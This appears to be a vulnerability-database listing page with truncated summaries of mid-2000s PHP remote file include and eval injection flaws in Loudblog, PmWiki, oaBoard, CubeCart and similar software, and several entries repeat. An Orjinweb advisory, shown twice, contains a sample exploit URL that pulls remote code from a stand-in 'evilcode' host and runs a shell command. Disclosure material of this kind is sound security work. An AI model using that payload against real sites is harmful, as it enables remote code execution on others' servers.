CVE-2006-0565

CVE-2006-0565 affects Loudblog 0.4 and earlier. The vulnerability is a PHP remote file include in inc/backend_settings.php that allows an attacker to execute arbitrary PHP code via a URL supplied to the $GLOBALS[path] parameter. The NVD entries describe that remote code execution is possible, wit...

Code injection

Unspecified vulnerability in index.php in a certain application available from /v1/tr/portfoy.php on www.egeinternet.com allows remote attackers to execute arbitrary code via "evilcode" in the key parameter, possibly a PHP remote file include vulnerability in which the attack vector is a URL in t...

CVE-2003-1292

CVE-2003-1292 concerns ashNews 0.83. The vulnerability is a PHP remote file inclusion (RFI) where an attacker can use a URL in the pathtoashnews parameter to ashnews.php and ashheadlines.php to include and execute remote files. Affected software: ashNews 0.83. The CVSS details from NVD indicate a...

PmWiki 2.1 - Multiple Input Validation Vulnerabilities

PmWiki 2.1 - Multiple Input Validation Vulnerabilities source: https://www.securityfocus.com/bid/16421/info PmWiki is prone to multiple input-validation vulnerabilities. These issues are due to failures in the application to properly sanitize user-supplied input. - Arbitrary remote file-include...

PmWiki 2.1 - Multiple Input Validation Vulnerabilities

source: https://www.securityfocus.com/bid/16421/info PmWiki is prone to multiple input-validation vulnerabilities. These issues are due to failures in the application to properly sanitize user-supplied input. - Arbitrary remote file-include vulnerability. Exploitation of this issue will result in...

Design/Logic Flaw

Eval injection vulnerability in ezDatabase 2.0 and earlier allows remote attackers to execute arbitrary PHP code via the dbid parameter to visitorupload.php, as demonstrated using phpinfo and include function calls...

CVE-2006-0214

Eval injection vulnerability in ezDatabase 2.0 and earlier allows remote attackers to execute arbitrary PHP code via the dbid parameter to visitorupload.php, as demonstrated using phpinfo and include function calls...

CVE-2006-0171

PHP remote file include vulnerability in index.php in OrjinWeb E-commerce allows remote attackers to execute arbitrary code via a URL in the page parameter. NOTE: it is not clear, but OrjinWeb might be an application service, in which case it should not be included in CVE...

CVE-2006-0171

PHP remote file include vulnerability in index.php in OrjinWeb E-commerce allows remote attackers to execute arbitrary code via a URL in the page parameter. NOTE: it is not clear, but OrjinWeb might be an application service, in which case it should not be included in CVE...

Orjinweb E-commerce

Orjinweb E-commerce Remote File Include Vulnerability http://www.targetsite.com/?page=http://evilcode.txt?&cmd=uname -a...

orjinweb.txt

Orjinweb E-commerce Remote File Include Vulnerability http://www.targetsite.com/?page=http://evilcode.txt?&cmd=uname -a...

Remote file include in appserv 2.4.5 (possible in previous versions)

====================================================================== Remote file include in appserv 2.4.5 possible in previous versions ====================================================================== What is Appserv AppServ is the Apache/PHP/MySQL open source software installer packages...

CVE-2006-0099

CVE-2006-0099 is a PHP remote file include vulnerability in Valdersoft Shopping Cart 3.0. The flaw occurs in (1) include/templates/categories/default.php and (2) other include/templates/categories/ PHP scripts, where an attacker can cause arbitrary code execution by supplying a crafted URL in the...

EUVD-2006-0107

PHP remote file include vulnerability in 1 include/templates/categories/default.php and 2 certain other include/templates/categories/ PHP scripts in Valdersoft Shopping Cart 3.0 allows remote attackers to execute arbitrary code via a URL in the catalogDocumentRoot parameter...

CVE-2006-0094

PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the incstat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third...

Design/Logic Flaw

PHP remote file include vulnerability in forum.php in oaBoard 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the incstat parameter, a different vulnerability than CVE-2006-0076. NOTE: the provenance of this information is unknown; the details are obtained solely from third...

CVE-2006-0094

CVE-2006-0094 describes a PHP remote file include in oaBoard 1.0, specifically in forum.php via the inc_stat parameter, enabling remote attackers to execute arbitrary PHP code. The connected documents confirm oaBoard 1.0 as affected and do not provide remediation details. No exploits or fixed ver...

CVE-2006-0076

This CVE (CVE-2006-0076) relates to oaBoard 1.0: a PHP remote file inclusion flaw in forum.php where an input parameter inc can be controlled via URL to include a PHP file. The underlying issue is unsafely including external input as code, enabling arbitrary PHP execution if a remote file is incl...

CVE-2006-0064

PHP remote file include vulnerability in includes/orderSuccess.inc.php in CubeCart allows remote attackers to execute arbitrary PHP code via a URL in the globrootDir parameter...

CVE-2006-0064

The CVE-2006-0064 entry concerns CubeCart. Multiple connected records confirm a PHP remote file inclusion vulnerability in includes/orderSuccess.inc.php, exploitable via a URL parameter glob[rootDir] that allows execution of arbitrary PHP code. This indicates a client-controllable file inclusion ...